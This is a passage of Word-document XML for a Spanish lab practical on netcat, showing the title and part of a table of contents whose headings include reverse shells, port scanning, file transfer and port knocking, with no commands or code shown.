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3AAB" w14:textId="77777777" w:rsidR="00AA7C77" w:rsidRDefault="007F7233" w:rsidP="00AA607C">
      <w:pPr>
        <w:pStyle w:val="Ttulo"/>
      </w:pPr>
      <w:r>
        <w:t>Práctica de laboratorio</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E5E91A7" w14:textId="4B6733AB" w:rsidR="007F7233" w:rsidRDefault="00CA7704" w:rsidP="00AA607C">
      <w:pPr>
        <w:pStyle w:val="Ttulo"/>
      </w:pPr>
      <w:r w:rsidRPr="00CA7704">
        <w:t>509-FJGG-PARP202-Netcat</w:t>
      </w:r>
      <w:r w:rsidR="007F7233">
        <w:t>.doc</w:t>
      </w:r>
      <w:r w:rsidR="00ED1778">
        <w:t>x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5135F858" w14:textId="77777777" w:rsidR="00CA7704" w:rsidRPr="00CA7704" w:rsidRDefault="00CA7704" w:rsidP="00CA7704"/>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:id w:val="46424751"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w14:paraId="479813F6" w14:textId="3EC75DB2" w:rsidR="00CA7704" w:rsidRDefault="00CA7704">
          <w:pPr>
            <w:pStyle w:val="TtuloTDC"/>
          </w:pPr>
          <w:r>
            <w:t>Tabla de contenido</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="79A8CADB" w14:textId="375C09EB" w:rsidR="00E0440D" w:rsidRDefault="00CA7704">
          <w:pPr>
            <w:pStyle w:val="TDC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9736"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="es-ES"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc182474722" w:history="1">
            <w:r w:rsidR="00E0440D" w:rsidRPr="00CF0E2B">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Objetivo de la práctica</w:t>
            </w:r>
            <w:r w:rsidR="00E0440D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E0440D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E0440D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc182474722 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E0440D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E0440D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E0440D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="00E0440D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5B7B346F" w14:textId="7AAC5542" w:rsidR="00E0440D" w:rsidRDefault="00E0440D">
          <w:pPr>
            <w:pStyle w:val="TDC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9736"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="es-ES"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc182474723" w:history="1">
            <w:r w:rsidRPr="00CF0E2B">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Inventario de material necesario</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc182474723 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2097705A" w14:textId="343E46C5" w:rsidR="00E0440D" w:rsidRDefault="00E0440D">
          <w:pPr>
            <w:pStyle w:val="TDC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9736"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="es-ES"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc182474724" w:history="1">
            <w:r w:rsidRPr="00CF0E2B">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Ejecución</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc182474724 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6CBDE0FE" w14:textId="63CFE518" w:rsidR="00E0440D" w:rsidRDefault="00E0440D">
          <w:pPr>
            <w:pStyle w:val="TDC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9736"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="es-ES"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc182474725" w:history="1">
            <w:r w:rsidRPr="00CF0E2B">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>¿Qué es netcat?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc182474725 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4B6D683C" w14:textId="31D2271B" w:rsidR="00E0440D" w:rsidRDefault="00E0440D">
          <w:pPr>
            <w:pStyle w:val="TDC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9736"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="es-ES"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc182474726" w:history="1">
            <w:r w:rsidRPr="00CF0E2B">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Instalar netcat en Ubuntu</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc182474726 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3F44984B" w14:textId="3267EC0F" w:rsidR="00E0440D" w:rsidRDefault="00E0440D">
          <w:pPr>
            <w:pStyle w:val="TDC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9736"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="es-ES"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc182474727" w:history="1">
            <w:r w:rsidRPr="00CF0E2B">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Instalar netcat en Windows</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc182474727 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="45934E90" w14:textId="24DF623E" w:rsidR="00E0440D" w:rsidRDefault="00E0440D">
          <w:pPr>
            <w:pStyle w:val="TDC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9736"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="es-ES"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc182474728" w:history="1">
            <w:r w:rsidRPr="00CF0E2B">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Distintos usos del netcat</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc182474728 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3F39B192" w14:textId="6178CC66" w:rsidR="00E0440D" w:rsidRDefault="00E0440D">
          <w:pPr>
            <w:pStyle w:val="TDC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9736"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="es-ES"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc182474729" w:history="1">
            <w:r w:rsidRPr="00CF0E2B">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Reverse Shell con netcat</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc182474729 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="235DFDEA" w14:textId="31190F61" w:rsidR="00E0440D" w:rsidRDefault="00E0440D">
          <w:pPr>
            <w:pStyle w:val="TDC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9736"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="es-ES"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc182474730" w:history="1">
            <w:r w:rsidRPr="00CF0E2B">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Netcat como chat entre dos equipos</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc182474730 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="67E2C59C" w14:textId="626895B2" w:rsidR="00E0440D" w:rsidRDefault="00E0440D">
          <w:pPr>
            <w:pStyle w:val="TDC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9736"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="es-ES"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc182474731" w:history="1">
            <w:r w:rsidRPr="00CF0E2B">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Transferir archivos de un equipo a otro</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc182474731 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="01C3D614" w14:textId="24FCCA2B" w:rsidR="00E0440D" w:rsidRDefault="00E0440D">
          <w:pPr>
            <w:pStyle w:val="TDC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9736"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="es-ES"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc182474732" w:history="1">
            <w:r w:rsidRPr="00CF0E2B">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Escaneo de puertos</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc182474732 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="50F88007" w14:textId="2E034FDF" w:rsidR="00E0440D" w:rsidRDefault="00E0440D">
          <w:pPr>
            <w:pStyle w:val="TDC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9736"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="es-ES"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc182474733" w:history="1">
            <w:r w:rsidRPr="00CF0E2B">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Netcat para Port Knocking</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc182474733 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="68546050" w14:textId="6A1616E6" w:rsidR="00E0440D" w:rsidRDefault="00E0440D">
          <w:pPr>
            <w:pStyle w:val="TDC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9736"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="es-ES"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc182474734" w:history="1">
            <w:r w:rsidRPr="00CF0E2B">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Usar “timeouts” en netcat</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc182474734 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="07FFD0C1" w14:textId="5408F06B" w:rsidR="00E0440D" w:rsidRDefault="00E0440D">
          <w:pPr>
            <w:pStyle w:val="TDC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9736"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="es-ES"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc182474735" w:history="1">
            <w:r w:rsidRPr="00CF0E2B">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Impedir que el servidor termine cuando el cliente se cierra</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc182474735 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7BF840F8" w14:textId="76AAAB16" w:rsidR="00E0440D" w:rsidRDefault="00E0440D">
          <w:pPr>
            <w:pStyle w:val="TDC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9736"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="es-ES"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc182474736" w:history="1">
            <w:r w:rsidRPr="00CF0E2B">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Usar UDP en vez de TCP</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc182474736 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7DE16785" w14:textId="0DAB50AE" w:rsidR="00E0440D" w:rsidRDefault="00E0440D">
          <w:pPr>
            <w:pStyle w:val="TDC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9736"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="es-ES"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc182474737" w:history="1">
            <w:r w:rsidRPr="00CF0E2B">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Retrasar que el servidor termine cuando reciba un EOF desde el cliente</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
